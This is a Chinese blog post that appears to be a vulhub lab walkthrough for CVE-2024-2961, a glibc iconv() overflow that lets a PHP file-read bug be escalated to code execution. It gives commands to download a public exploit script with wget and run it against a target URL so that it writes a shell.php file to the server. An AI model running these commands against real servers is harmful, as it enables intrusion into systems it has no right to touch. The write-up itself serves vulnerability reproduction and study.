vulhub中PHP利用GNU C Iconv将文件读取变成RCE(CVE-2024-2961)

余生有个小酒馆2024-06-02 9:10

GNU C 是一个标准的ISO C依赖库。在GNU C中,iconv()函数2.39及以前存在一处缓冲区溢出漏洞,这可能会导致应用程序崩溃或覆盖相邻变量。

如果一个PHP应用中存在任意文件读取漏洞,攻击者可以利用`iconv()`的这个CVE-2024-2961漏洞,将其提升为代码执行漏洞。

漏洞复现

在使用原作者给出的[exploit](https://github.com/ambionics/cnext-exploits)前,你需要准备一个Linux环境和Python 3.10解释器。

安装依赖:

pip install pwntools

pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip

然后从<https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py\>下载POC并执行:

wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py

python cnext-exploit.py http://your-ip:8080/index.php "echo '<?=phpinfo();?>' > shell.php"

已经成功写入shell.php:

相关推荐
量子炒饭大师11 分钟前
【C++入门】Cyber神经的义体插件 —— 【类与对象】内部类
java·开发语言·c++·内部类·嵌套类
Hx_Ma1616 分钟前
测试题(四)
java·开发语言·jvm
多打代码31 分钟前
2026.02.11
开发语言·python
lly20240633 分钟前
Scala IF...ELSE 语句详解
开发语言
爱编码的小八嘎43 分钟前
第2章 认识CPU-2.4 【实例】:在DOS实模式下读取4GB内存(1)
c语言
百锦再43 分钟前
Java重入锁(ReentrantLock)全面解析:从入门到源码深度剖析
java·开发语言·struts·spring·kafka·tomcat·intellij-idea
Electron-er1 小时前
深入解析C语言memcmp函数:内存比较的利器与陷阱(附实战案例)
c语言·开发语言
m0_531237171 小时前
C语言-操作符
c语言·开发语言
清水白石0081 小时前
Python 性能分析实战指南:timeit、cProfile、line_profiler 从入门到精通
开发语言·python
月光有害1 小时前
深入解析批归一化 (Batch Normalization): 稳定并加速深度学习的基石
开发语言·深度学习·batch
热门推荐
01从零搭建一个 PHP 登录注册系统(含完整源码)02使用 1panel面板 部署 php网站03GitHub 镜像站点04PHP Error: 常见错误及其解决方法05AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法08如何将 TRAE IDE 的插件市场源切换至 VS Code 官方市场09openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)